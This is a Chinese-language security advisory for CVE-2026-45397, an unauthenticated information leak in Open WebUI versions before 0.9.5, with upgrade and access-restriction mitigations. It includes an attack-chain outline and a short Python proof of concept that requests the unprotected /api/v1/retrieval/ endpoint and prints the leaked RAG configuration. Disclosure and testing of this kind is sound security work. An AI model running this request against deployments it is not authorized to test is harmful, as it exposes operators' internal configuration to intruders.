CVE-2026-45397 CVSS 5.3 中危

CVE-2026-45397 Open WebUI信息泄露漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45397

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个可离线运行的自托管人工智能平台。在0.9.5版本之前，该系统存在一个安全漏洞。未经身份验证的攻击者可以通过向/api/v1/retrieval/端点发送GET请求，获取实时的RAG（检索增强生成）管道配置信息。该接口未进行权限校验，导致敏感配置信息泄露。尽管同一路由器上的其他端点（如/embedding和/config）已通过get_admin_user进行了保护，但该特定端点被遗漏。该漏洞在0.9.5版本中已得到修复。

技术细节

该漏洞的根本原因在于Open WebUI的后端API路由配置不当。在受影响的版本中，/api/v1/retrieval/端点被错误地配置为允许匿名访问，而与其相邻的端点均正确实施了get_admin_user中间件进行身份验证和授权检查。攻击者无需拥有任何凭证（如Authorization头、Cookie或API密钥），即可直接构造HTTP GET请求访问该端点。成功利用该漏洞后，攻击者能够获取系统当前的RAG管道配置。RAG管道配置通常包含敏感的连接信息、向量数据库设置、提示词模板等内部逻辑细节。虽然此漏洞本身不直接导致服务器被控制或代码执行，但泄露的配置信息可以为后续的针对性攻击提供重要情报，降低攻击者的探测成本。漏洞的触发条件仅要求服务开放在公网或内网可达，且使用的是存在漏洞的旧版本软件。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是Open WebUI，且版本低于0.9.5。

STEP 2

漏洞利用

攻击者直接向/api/v1/retrieval/发送未认证的HTTP GET请求。

STEP 3

信息获取

服务器返回RAG管道配置信息，攻击者成功读取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target = "http://127.0.0.1:8080"

# Vulnerable endpoint
url = f"{target}/api/v1/retrieval/"

try:
    # Send GET request without authentication
    response = requests.get(url, timeout=10)

    if response.status_code == 200:
        print("[+] Vulnerability confirmed! RAG config leaked:")
        print(response.text)
    else:
        print(f"[-] Unexpected status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Open WebUI < 0.9.5

防御指南

临时缓解措施

建议立即升级Open WebUI至0.9.5或更高版本以彻底修复此漏洞。如果无法立即升级，应在网络边界设备（如防火墙或反向代理）上限制对/api/v1/retrieval/路径的访问，仅允许受信任的IP地址或经过身份验证的请求通过。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表